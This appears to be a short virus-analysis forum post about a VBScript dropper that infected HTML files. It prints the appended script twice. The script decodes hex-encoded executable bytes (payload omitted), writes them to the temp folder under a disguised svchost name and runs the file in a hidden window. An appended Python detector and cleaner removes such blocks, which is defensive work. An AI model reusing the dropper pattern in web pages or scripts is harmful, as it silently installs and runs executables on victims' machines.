
Virus Analysis | admin | 3 years ago (2017-11-17)
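I recently ran into a JS script-infecting virus that had infected every single HTML file. It appends a piece of JS code to the end of each file; what it does is unknown. 360 reports it as the virus.vbs.writebin.a virus.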

The code is roughly structured like this.
<SCRIPT Language=VBScript><!--
DropFileName = "svchost*ex.e**"
' Hex-encoded file contents; the string begins with 4D5A, the "MZ" signature of a Windows executable.
WriteData = "4D5A9000 ... (large amount of hex omitted) ..."
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is the temporary folder.
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    ' Write the decoded bytes to the drop path, two hex digits at a time.
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
' Run the dropped file with a hidden window (window style 0).
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost*ex.e**"
WriteData = "4D5A9000 ... (large amount of hex omitted) ..."
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
It seems to be fairly capable; here is the sample for anyone who needs it.
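
A check for the appended block shown above, added here as an example (it is not part of the original post): it finds VBScript `<script>` elements whose `WriteData` string starts with the MZ bytes and which use both `Scripting.FileSystemObject` and `WScript.Shell`, and removes them from the HTML. The function names, the heuristic and the sample input are assumptions constructed for illustration.

```python
import re

# Any <script> element: group 1 = attributes, group 2 = body.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
# First two bytes of the hex string assigned to WriteData.
HEX_RE = re.compile(r'WriteData\s*=\s*"\s*([0-9A-Fa-f]{4})', re.I)

def is_dropper(attrs, body):
    """Heuristic (assumed): VBScript + MZ-prefixed WriteData + file write + run."""
    if "vbscript" not in attrs.lower():
        return False
    m = HEX_RE.search(body)
    if not m or bytes.fromhex(m.group(1)) != b"MZ":
        return False
    low = body.lower()
    return "scripting.filesystemobject" in low and "wscript.shell" in low

def scan(html):
    """Return (start, end) offsets of every matching script block."""
    return [m.span() for m in SCRIPT_RE.finditer(html)
            if is_dropper(m.group(1), m.group(2))]

def clean(html):
    """Return html with matching blocks removed and everything else intact."""
    out, pos = [], 0
    for start, end in scan(html):
        out.append(html[pos:start])
        pos = end
    out.append(html[pos:])
    return "".join(out)

# Constructed sample: inert marker strings only, no real payload.
BENIGN = "<html><body><script>var a = 1;</script></body></html>"
BLOCK = ('<SCRIPT Language=VBScript><!--\n'
         'WriteData = "4D5A0000"\n'
         'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
         'Set WSHshell = CreateObject("WScript.Shell")\n'
         '//--></SCRIPT>')
INFECTED = BENIGN + BLOCK + BLOCK  # appended at end of file, twice as in the post

if __name__ == "__main__":
    print(len(scan(INFECTED)), "block(s) found")
    print(clean(INFECTED) == BENIGN)
```

Cleaning the HTML files does not remove the executable the script writes to the temporary folder, so the host itself still needs to be scanned.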